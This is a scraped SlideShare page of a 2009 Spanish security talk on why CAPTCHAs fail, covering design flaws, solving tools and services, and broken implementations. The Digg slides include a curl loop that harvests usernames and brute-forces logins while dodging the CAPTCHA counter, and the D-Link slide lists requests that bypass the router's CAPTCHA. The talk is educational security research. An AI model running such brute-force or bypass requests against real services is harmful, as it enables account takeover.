SlideShare ist ein Scribd-Unternehmen logo

Crapcha Sv1.0 Slide Share

Alejandro Ramos
Alejandro Ramos

CAPTCHAs

Technologie
1 von 51
Downloaden Sie, um offline zu lesen
C[R]APCHAS. Alejandro Ramos CISSP, CISA Salamanca – Julio 2009 securitybydefault.com
Completely Automated Public Turing test to CAPTCHAS. tell Computers and Humans Apart. Prueba de Turing pública y automática para C[R]APCHAS. diferenciar máquinas y humano Curso de Verano - Salamanca, julio 2009
Introducción • Creador Luis von Ahn, Manuel Blum y Nicolas J. Hooper • Año 2000 • Evitar añadir sitios al directorio de Yahoo! automáticamente. • Pregunta – Respuesta • Reverse Turing C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
• Antes de llevar a cabo una acción se comprueba la condición de Hommer. • Previene que software automático realice: – SPAM: blogs, wikis, foros – Registro masivo de usuarios – Votaciones – Fuerza Bruta de usuarios / contraseñas • Diseño: – Fácil de resolver para el hombre – Difícil de resolver para la máquina – Fácil de generar y evaluar C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Tipos de captcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿allant? NO SI C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Evolución EZ-Gimpy + Contraste + Fondo + Fuente no fija + Línea - Fondos + Superposición C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Captchas no resolvibles Accesibilidad http://www.w3.org/TR/turingtest/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Vulnerabilidades • Tipo de letra: – No variable – Sin rotación – Colores fijos – Sin deformación – Sin superposición – Misma posición de caracteres – Misma longitud de caracteres – Reducido código de caracteres • Fondo: – Colores fijos – Sin textura o textura fija C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Diseño seguro • Rotar colores en la fuente y el fondo. • Uso de mayúsculas y minúsculas. • Letras más oscuras y más claras que el fondo. • Uso de escala de colores (gradient). • No alinear los caracteres horizontalmente. • Sobreponer las letras. • No utilizar palabras de diccionario. • Distinta longitud de caracteres. • Dibujar líneas sobre las letras del mismo color. • Amplio código de caracteres. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Métodos para saltar CAPTCHAs • Mediante el uso de OCR / IVR • Explotando la implantación - MoBIC • Usando mano de obra barata C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Cortar, copiar, pintar y colorear A R C 3 I C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Herramientas Disponibles • PWNtcha: http://caca.zoy.org/wiki/PWNtcha • CAP-OCR: http://cap-cap.ru/ • Captcha Breaker: http://churchturing.org/captcha- dist/ • aiCaptcha: http://www.mperfect.net/aiCaptcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
PWNtcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Ataques 2008 Google (Jan 17) 20% Hotmail (Feb 6) 30-35% Yahoo (Feb 22) 30-35% C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Software C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
jDownloader. jAntiCaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Servicios Captcha http://www.lafdc.com/captcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Captchas de Voz •No son efectivos •Más inseguros que los tradicionales de imágenes •Poco difundidos •Pruebas de concepto para Google •IVR (Interactive Voice Response) http://blog.wintercore.com/?p=11 http://vorm.net/captchas C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Resolviendo Captchas a Bajo coste Resolviendo CAPTCHAS Semiautomáticamente C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
A mano… C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Decaptcher.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
IMPLANTACIONES C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Router D-Link 1. Modificación de los DNS del router por malware (pharming) 2. D-Link actualiza firmware añadiendo un CAPTCHA a la autenticación. 3. La implantación es incorrecta, paginas como la que gestiona contraseña WPA, son accedidas sin necesidad de CAPTCHA GET /post_login.xml?hash=c8[…]a&auth_code=02F&auth_id=26 GET / /post_login.xml?hash=c8[…]6a GET / /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 http://www.milw0rm.com/exploits/8696 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Fallos genéricos en Implantaciones • Re-utilizando el ID de sesión para un CAPTCHA conocido • Envío de identificación de CAPTCHA + solución, re-utilización de CAPTCHAs conocidos. • Reiniciando intentos con usuario conocido • Uso de un número reducido de CAPTCHAS (generación de BBDD) • Vulnerable a otros ataques web: XSS, CSRF, etc C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
DNI-Pasaporte <td align="center" style="font-size: 30pt; font-family: Courier; color: blue;">T</td> <td align="center" style="font-size: 30pt; font-family: Arial; color: blue;">B</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">I</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">J</td> http://rafavargas.com/2008/05/14/un-candidato-a-peor-captcha-de-la-historia/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Red.Es http://mnm.uib.es/gallir/posts/2007/06/09/1108 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Worlds’s most influential person Revista Time C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
reCaptcha.com •60 millones de captcha resueltos por día •Technorati, meneame, twitter, lastfm.es …. Etc •10 millones de palabras por día C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Megaupload.com Descarga de Archivo http://wwwq3.megaupload.com/gencap.php?60d8950a074984e0.gif C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Captchanumbers (php class) http://www.lucianobello.com.ar/post/captchas-the-good-the- bad-and-the-ugly/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com •Envío usuario y contraseña mediante un POST •El servidor crea una sesión y devuelve un 302 (redirección) a otra página que comprueba si la sesión es correcta o incorrecta en base al usuario y contraseña •Si la contraseña es válida paso, si no es válida me envía a la página de autenticación con un error y la misma sesión que suma 1 error fallido. •Elimino la sesión (y con ello el contador) y repito el envío de usuario y contraseña, volviendo al punto 1. Por lo que el captcha no aparecerá nunca al no sumar los cuatro intentos. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com 302 Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos+1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com 302 Se elimina cookie Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos +1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com Usuarios demócratas: (nicknames == usernames) for i in `seq 1 1018`; do curl –d "getdpage=$i&id=10&page=3&friends=0" "http://digg.com/politics/Bobama_s_44th_Amer/who” | grep users|sed -e 's|.*href="/users/(.*)">.*|1|g’ done Password “123456” (nadie la usa) for pass in password 123456; do for i in `cat USUARIOSOBAMA`; do echo -n $i:$pass curl -c digg.txt -s -L -D - -d "username=$i&password=$pass&persistent=on" 'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedIn|incorrect"; done done |tee -a passwd2.digg C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
Conclusiones • Los CAPTCHA son un sistema de eficacia dudable. •El mayor riesgo al que se somete es la mano de obra barata. •Su implantación es compleja y requiere de un análisis profundo. •Un diseño incorrecto puede volver la medida inútil C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
C[R]APCHAS. Curso de Verano - Salamanca, julio 2009

Empfohlen

Libro de Seguridad en Redes
Libro de Seguridad en RedesLibro de Seguridad en Redes
Libro de Seguridad en RedesTelefónica
 
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)Alejandro Ramos
 
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresAlejandro Ramos
 
Cookies y otras tecnologías de monitorización en internet
Cookies y otras tecnologías de monitorización en internetCookies y otras tecnologías de monitorización en internet
Cookies y otras tecnologías de monitorización en internetAlejandro Ramos
 
Ejemplos de seguridad en aplicaciones moviles (IOS)
Ejemplos de seguridad en aplicaciones moviles (IOS) Ejemplos de seguridad en aplicaciones moviles (IOS)
Ejemplos de seguridad en aplicaciones moviles (IOS) Alejandro Ramos
 
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Alejandro Ramos
 
Te pique lo que te pique, analiza un SQLite
Te pique lo que te pique, analiza un SQLiteTe pique lo que te pique, analiza un SQLite
Te pique lo que te pique, analiza un SQLiteAlejandro Ramos
 
Shodab
ShodabShodab
ShodabAlejandro Ramos
 

Empfohlen

Libro de Seguridad en Redes
Libro de Seguridad en RedesLibro de Seguridad en Redes
Libro de Seguridad en RedesTelefónica
 
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)Alejandro Ramos
 
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresAlejandro Ramos
 
Cookies y otras tecnologías de monitorización en internet
Cookies y otras tecnologías de monitorización en internetCookies y otras tecnologías de monitorización en internet
Cookies y otras tecnologías de monitorización en internetAlejandro Ramos
 
Ejemplos de seguridad en aplicaciones moviles (IOS)
Ejemplos de seguridad en aplicaciones moviles (IOS) Ejemplos de seguridad en aplicaciones moviles (IOS)
Ejemplos de seguridad en aplicaciones moviles (IOS) Alejandro Ramos
 
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Alejandro Ramos
 
Te pique lo que te pique, analiza un SQLite
Te pique lo que te pique, analiza un SQLiteTe pique lo que te pique, analiza un SQLite
Te pique lo que te pique, analiza un SQLiteAlejandro Ramos
 
Shodab
ShodabShodab
ShodabAlejandro Ramos
 
Forense en windows - Resolución Reto I de Dragonjar
Forense en windows - Resolución Reto I de DragonjarForense en windows - Resolución Reto I de Dragonjar
Forense en windows - Resolución Reto I de DragonjarAlejandro Ramos
 
Análisis forense en linux - Compromised Linux Server
Análisis forense en linux - Compromised Linux ServerAnálisis forense en linux - Compromised Linux Server
Análisis forense en linux - Compromised Linux ServerAlejandro Ramos
 
Advanced password cracking
Advanced password crackingAdvanced password cracking
Advanced password crackingAlejandro Ramos
 
Seguridad en PDF: Adobe ¬¬
Seguridad en PDF: Adobe ¬¬Seguridad en PDF: Adobe ¬¬
Seguridad en PDF: Adobe ¬¬Alejandro Ramos
 
Wargame
WargameWargame
WargameAlejandro Ramos
 
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetJornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetAlejandro Ramos
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Alejandro Ramos
 
Pentest curso de verano - valencia 2010
Pentest curso de verano - valencia 2010Pentest curso de verano - valencia 2010
Pentest curso de verano - valencia 2010Alejandro Ramos
 
Seguridad en PDF - Adobe ¬¬
Seguridad en PDF - Adobe ¬¬Seguridad en PDF - Adobe ¬¬
Seguridad en PDF - Adobe ¬¬Alejandro Ramos
 
Rooted2010 Otp
Rooted2010 OtpRooted2010 Otp
Rooted2010 OtpAlejandro Ramos
 
Owasp Top10 FireFox
Owasp Top10 FireFoxOwasp Top10 FireFox
Owasp Top10 FireFoxAlejandro Ramos
 
Fist - Negocio Pirateria
Fist - Negocio PirateriaFist - Negocio Pirateria
Fist - Negocio PirateriaAlejandro Ramos
 
Seguridad en Bluetooth
Seguridad en BluetoothSeguridad en Bluetooth
Seguridad en BluetoothAlejandro Ramos
 
DNI-E
DNI-EDNI-E
DNI-EAlejandro Ramos
 
DoS En La Ciberguerra
DoS En La CiberguerraDoS En La Ciberguerra
DoS En La CiberguerraAlejandro Ramos
 
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramDIDIERFERNANDOGUERRE
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerExcel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerValentinaTabares11
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOnarvaezisabella21
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 

Weitere ähnliche Inhalte

Mehr von Alejandro Ramos

Forense en windows - Resolución Reto I de Dragonjar
Forense en windows - Resolución Reto I de DragonjarForense en windows - Resolución Reto I de Dragonjar
Forense en windows - Resolución Reto I de DragonjarAlejandro Ramos
 
Análisis forense en linux - Compromised Linux Server
Análisis forense en linux - Compromised Linux ServerAnálisis forense en linux - Compromised Linux Server
Análisis forense en linux - Compromised Linux ServerAlejandro Ramos
 
Advanced password cracking
Advanced password crackingAdvanced password cracking
Advanced password crackingAlejandro Ramos
 
Seguridad en PDF: Adobe ¬¬
Seguridad en PDF: Adobe ¬¬Seguridad en PDF: Adobe ¬¬
Seguridad en PDF: Adobe ¬¬Alejandro Ramos
 
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetJornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetAlejandro Ramos
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Alejandro Ramos
 
Pentest curso de verano - valencia 2010
Pentest curso de verano - valencia 2010Pentest curso de verano - valencia 2010
Pentest curso de verano - valencia 2010Alejandro Ramos
 
Seguridad en PDF - Adobe ¬¬
Seguridad en PDF - Adobe ¬¬Seguridad en PDF - Adobe ¬¬
Seguridad en PDF - Adobe ¬¬Alejandro Ramos
 
Fist - Negocio Pirateria
Fist - Negocio PirateriaFist - Negocio Pirateria
Fist - Negocio PirateriaAlejandro Ramos
 

Mehr von Alejandro Ramos (15)

Forense en windows - Resolución Reto I de Dragonjar
Forense en windows - Resolución Reto I de DragonjarForense en windows - Resolución Reto I de Dragonjar
Forense en windows - Resolución Reto I de Dragonjar
 
Análisis forense en linux - Compromised Linux Server
Análisis forense en linux - Compromised Linux ServerAnálisis forense en linux - Compromised Linux Server
Análisis forense en linux - Compromised Linux Server
 
Advanced password cracking
Advanced password crackingAdvanced password cracking
Advanced password cracking
 
Seguridad en PDF: Adobe ¬¬
Seguridad en PDF: Adobe ¬¬Seguridad en PDF: Adobe ¬¬
Seguridad en PDF: Adobe ¬¬
 
Wargame
WargameWargame
Wargame
 
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnetJornada de ciberdefensa stuxnet
Jornada de ciberdefensa stuxnet
 
Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0Resolución de concursos de la NoConName 2010 v1.0
Resolución de concursos de la NoConName 2010 v1.0
 
Pentest curso de verano - valencia 2010
Pentest curso de verano - valencia 2010Pentest curso de verano - valencia 2010
Pentest curso de verano - valencia 2010
 
Seguridad en PDF - Adobe ¬¬
Seguridad en PDF - Adobe ¬¬Seguridad en PDF - Adobe ¬¬
Seguridad en PDF - Adobe ¬¬
 
Rooted2010 Otp
Rooted2010 OtpRooted2010 Otp
Rooted2010 Otp
 
Owasp Top10 FireFox
Owasp Top10 FireFoxOwasp Top10 FireFox
Owasp Top10 FireFox
 
Fist - Negocio Pirateria
Fist - Negocio PirateriaFist - Negocio Pirateria
Fist - Negocio Pirateria
 
Seguridad en Bluetooth
Seguridad en BluetoothSeguridad en Bluetooth
Seguridad en Bluetooth
 
DNI-E
DNI-EDNI-E
DNI-E
 
DoS En La Ciberguerra
DoS En La CiberguerraDoS En La Ciberguerra
DoS En La Ciberguerra
 

Kürzlich hochgeladen

LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptchaverriemily794
 
Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramDIDIERFERNANDOGUERRE
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxGESTECPERUSAC
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerExcel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerValentinaTabares11
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOnarvaezisabella21
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfjeondanny1997
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxAlexander López
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 

Kürzlich hochgeladen (20)

LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).pptLUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
LUXOMETRO EN SALUD OCUPACIONAL(FINAL).ppt
 
Explorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ramExplorando la historia y funcionamiento de la memoria ram
Explorando la historia y funcionamiento de la memoria ram
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIAActividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
Tecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptxTecnologias Starlink para el mundo tec.pptx
Tecnologias Starlink para el mundo tec.pptx
 
Excel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel tallerExcel (1) tecnologia.pdf trabajo Excel taller
Excel (1) tecnologia.pdf trabajo Excel taller
 
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPOAREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
AREA TECNOLOGIA E INFORMATICA TRABAJO EN EQUIPO
 
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdfLa Electricidad Y La Electrónica Trabajo Tecnología.pdf
La Electricidad Y La Electrónica Trabajo Tecnología.pdf
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptxGoogle-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
Google-Meet-como-herramienta-para-realizar-reuniones-virtuales.pptx
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 

Crapcha Sv1.0 Slide Share

  • 1. C[R]APCHAS. Alejandro Ramos CISSP, CISA Salamanca – Julio 2009 securitybydefault.com
  • 2. Completely Automated Public Turing test to CAPTCHAS. tell Computers and Humans Apart. Prueba de Turing pública y automática para C[R]APCHAS. diferenciar máquinas y humano Curso de Verano - Salamanca, julio 2009
  • 3. Introducción • Creador Luis von Ahn, Manuel Blum y Nicolas J. Hooper • Año 2000 • Evitar añadir sitios al directorio de Yahoo! automáticamente. • Pregunta – Respuesta • Reverse Turing C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
